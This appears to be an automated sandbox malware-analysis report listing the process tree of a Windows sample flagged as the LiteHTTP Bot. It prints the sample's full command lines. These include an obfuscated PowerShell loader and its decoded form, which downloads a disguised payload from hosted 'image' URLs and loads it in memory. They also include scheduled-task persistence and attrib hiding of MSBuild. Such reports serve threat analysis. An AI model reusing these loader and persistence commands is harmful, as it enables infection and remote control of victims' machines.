                                                                                                                    2025-01-03 22:20:11 UTC3104INData Raw: 4a 30 67 43 41 41 67 52 6f 41 48 41 43 55 6a 63 4d 6f 41 41 41 55 45 4b 4b 41 41 41 38 67 43 63 41 49 77 4b 79 70 41 41 41 6f 44 4b 47 63 77 43 4b 41 41 41 45 68 53 48 4b 6f 41 41 41 6b 7a 62 4b 41 41 41 34 38 6d 43 41 41 77 4e 6f 41 41 41 52 41 41 41 4b 41 41 41 42 30 4d 41 4a 41 7a 47 42 41 41 41 62 73 42 41 34 64 48 41 42 41 41 41 41 41 41 41 41 73 41 41 71 74 41 41 66 42 67 41 41 41 41 48 42 6f 43 41 65 44 41 41 4b 41 41 41 39 67 69 43 41 41 41 50 6f 6f 41 41 41 73 7a 62 4a 41 48 41 42 73 75 63 41 30 77 47 65 44 41 33 41 6f 41 41 41 45 7a 62 49 63 41 4c 49 73 67 33 41 41 67 43 41 41 41 4d 76 68 41 41 4d 6f 41 41 41 45 45 4b 47 6f 77 42 41 6f 41 41 41 77 79 62 4b 41 41 41 63 67 69 6f 77 42 41 41 52 4c 6e 47 6c 49 71 41 5a 55 69 6f 77 42 51 41 62 4c 48
                                                                                                                    Data Ascii: J0gCAAgRoAHACUjcMoAAAUEKKAAA8gCcAIwKypAAAoDKGcwCKAAAEhSHKoAAAkzbKAAA48mCAAwNoAAARAAAKAAAB0MAJAzGBAAAbsBA4dHABAAAAAAAAsAAqtAAfBgAAAAHBoCAeDAAKAAA9giCAAAPooAAAszbJAHABsucA0wGeDA3AoAAAEzbIcALIsg3AAgCAAAMvhAAMoAAAEEKGowBAoAAAwybKAAAcgiowBAARLnGlIqAZUiowBQAbLH


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\3lhrJ4X.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\3lhrJ4X.exe"
                                                                                                                    Imagebase:0x7ff761f70000
                                                                                                                    File size:163'840 bytes
                                                                                                                    MD5 hash:21B5E69AEC540EAACE5AA6D588896218
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:cmd.exe /c 67784c48226c6.vbs
                                                                                                                    Imagebase:0x7ff74e980000
                                                                                                                    File size:289'792 bytes
                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:17:19:54
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                                                                                                                    Imagebase:0x7ff7be2a0000
                                                                                                                    File size:170'496 bytes
                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:17:19:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBu$G4$YwBi$GI$c$$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$ZgB3$HE$ZgB3$HI$ZQB3$C8$ZQB3$HE$cgB3$GY$dwBx$GY$LwBn$HI$bw$u$HQ$ZQBr$GM$dQBi$HQ$aQBi$Cc$L$$g$Cc$M$$n$Cw$I$$n$FM$d$Bh$HI$d$B1$H$$TgBh$G0$ZQ$n$Cw$I$$n$E0$cwBi$HU$aQBs$GQ$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:17:19:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:17:19:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:17:20:02
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                    Imagebase:0x7ff6ca160000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:17:20:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xc80000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: 00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:17:20:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"schtasks" /Query /TN "Msbuild"
                                                                                                                    Imagebase:0x2d0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:17:20:55
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:14
                                                                                                                    Start time:17:20:56
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0x2d0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:17:20:56
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:17:20:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                                                                    Imagebase:0x940000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:17
                                                                                                                    Start time:17:20:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:18
                                                                                                                    Start time:17:21:06
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                    Imagebase:0x50000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:19
                                                                                                                    Start time:17:21:06
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:17:21:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:21
                                                                                                                    Start time:17:21:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:22
                                                                                                                    Start time:17:21:16
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:17:21:16
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:25
                                                                                                                    Start time:17:21:29
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:26
                                                                                                                    Start time:17:21:29
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
